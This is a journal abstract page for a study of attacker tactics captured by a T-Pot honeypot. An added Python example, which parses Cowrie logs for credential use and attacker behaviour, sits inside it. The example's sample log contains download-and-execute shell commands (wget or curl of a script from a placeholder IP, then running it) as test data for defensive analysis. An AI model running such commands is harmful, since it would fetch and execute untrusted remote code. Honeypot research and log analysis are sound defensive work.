Analysis of attacker patterns and tactics using a T-Pot honeypot

Milton Gabriel Del Hierro Mosquera

Abstract


This study analyzed attack patterns and tactics in cybersecurity in order to understand the strategies used by malicious actors and to strengthen defensive mechanisms. The work centered on collecting, analyzing and interpreting data generated by real attacks, using a modified version of the T-Pot honeypot platform, which bundles multiple honeypots in Docker containers that emulate a range of vulnerable services. The methodology consisted of simulating a controlled environment to attract attackers, capturing their actions, and applying data-analysis techniques to identify recurring malicious behaviors. Detailed records were collected on exploitation attempts, evasion methods and credential-usage patterns, which made it possible to characterize the threats and to assess their frequency and complexity. The results revealed specific trends in attacker behavior and informed adjustments to cyber-defense strategies. Among the main findings was the effectiveness of honeypots for identifying attack vectors and anticipating incidents. The study concluded that deploying active monitoring environments contributed significantly to strengthening the security of critical infrastructure by providing information useful for decision-making on information-security protection.
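The abstract describes the analysis stage only in outline: collecting honeypot records and mining them for credential-usage and post-login behavior patterns. The following is an added example, not code from the article or from the T-Pot project, showing the shape such an analysis takes over the JSON logs that Cowrie (the SSH/Telnet honeypot shipped in T-Pot) writes. The field names (eventid, src_ip, session, username, password, input) follow Cowrie's JSON log format as I know it; the log lines themselves, the IP addresses and the recon/download markers are constructed for the example and are not data from the study.

```python
"""Added example: mine credential-use and post-login tactics from
Cowrie-style JSON logs (T-Pot).  Field names follow Cowrie's JSON log
format; the sample lines below are constructed, not real captures."""
import json
import re
from collections import Counter, defaultdict

# Constructed sample: three SSH sessions, one corrupt line to exercise the parser.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.10","session":"a1","username":"root","password":"root"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"uname -a"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"cd /tmp; wget http://198.51.100.7/x.sh; sh x.sh"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"b2","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"b2","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"b2","username":"pi","password":"raspberry"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.5","session":"c3"}
{"eventid":"cowrie.login.success","src_ip":"192.0.2.5","session":"c3","username":"root","password":"123456"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.5","session":"c3","input":"cat /proc/cpuinfo | grep name | wc -l"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.5","session":"c3","input":"cd /tmp; curl -O http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh"}
not json at all
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")
# Hypothetical marker lists for the example; a real study would tune these.
RECON_MARKERS = ("uname", "/proc/cpuinfo", "whoami", "nproc", "/etc/os-release")
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")


def parse_events(text):
    """One JSON object per line; corrupt or truncated lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def credential_stats(events):
    """Credential-usage patterns: attempts per (user, password) pair,
    login attempts per source IP, and the pairs that actually succeeded."""
    attempted, per_ip, succeeded = Counter(), Counter(), Counter()
    for e in events:
        if e.get("eventid") not in LOGIN_EVENTS:
            continue
        pair = (e.get("username"), e.get("password"))
        attempted[pair] += 1
        per_ip[e.get("src_ip")] += 1
        if e["eventid"] == "cowrie.login.success":
            succeeded[pair] += 1
    return attempted, per_ip, succeeded


def session_profiles(events):
    """Per-session view: did the attacker authenticate, what did they type,
    which URLs did they try to fetch, and which coarse tactics that implies."""
    profiles = defaultdict(lambda: {"src_ip": None, "authenticated": False,
                                    "commands": [], "downloads": []})
    for e in events:
        sid = e.get("session")
        if sid is None:
            continue
        prof = profiles[sid]
        prof["src_ip"] = prof["src_ip"] or e.get("src_ip")
        if e.get("eventid") == "cowrie.login.success":
            prof["authenticated"] = True
        elif e.get("eventid") == "cowrie.command.input":
            cmd = e.get("input", "")
            prof["commands"].append(cmd)
            prof["downloads"].extend(URL_RE.findall(cmd))
    for prof in profiles.values():
        tactics = set()
        if any(m in c for c in prof["commands"] for m in RECON_MARKERS):
            tactics.add("recon")
        if prof["downloads"]:
            tactics.add("payload_fetch")
        prof["tactics"] = sorted(tactics)
    return dict(profiles)


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    attempted, per_ip, succeeded = credential_stats(ev)
    print("top credential pairs:", attempted.most_common(3))
    print("attempts per source:", per_ip.most_common())
    print("successful pairs:", dict(succeeded))
    for sid, p in session_profiles(ev).items():
        print(sid, p["src_ip"], p["tactics"], p["downloads"])
```

Two points worth keeping in mind when running this over real T-Pot output: internet-exposed honeypots are dominated by automated scanners, so counting attempts per source IP (rather than raw attempts) is what separates a handful of aggressive botnets from genuinely widespread credential choices; and the fetched URLs are the most actionable artifact, since the same download host usually recurs across many sessions and can be pivoted on directly.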


Keywords


Cybersecurity; honeypots; threat analysis; attack tactics; intrusion monitoring.




DOI: https://doi.org/10.23857/pc.v10i10.10543






Polo del Conocimiento

Multidisciplinary Scientific-Academic Journal

ISSN: 2550-682X

Casa Editora del Polo

Manta - Ecuador

Address: Ciudadela El Palmar, II Etapa, Manta - Manabí - Ecuador.

Postal code: 130801

Telephone: 056051775 / 0991871420

Email: polodelconocimientorevista@gmail.com / director@polodelconocimiento.com

URL: https://www.polodelconocimiento.com/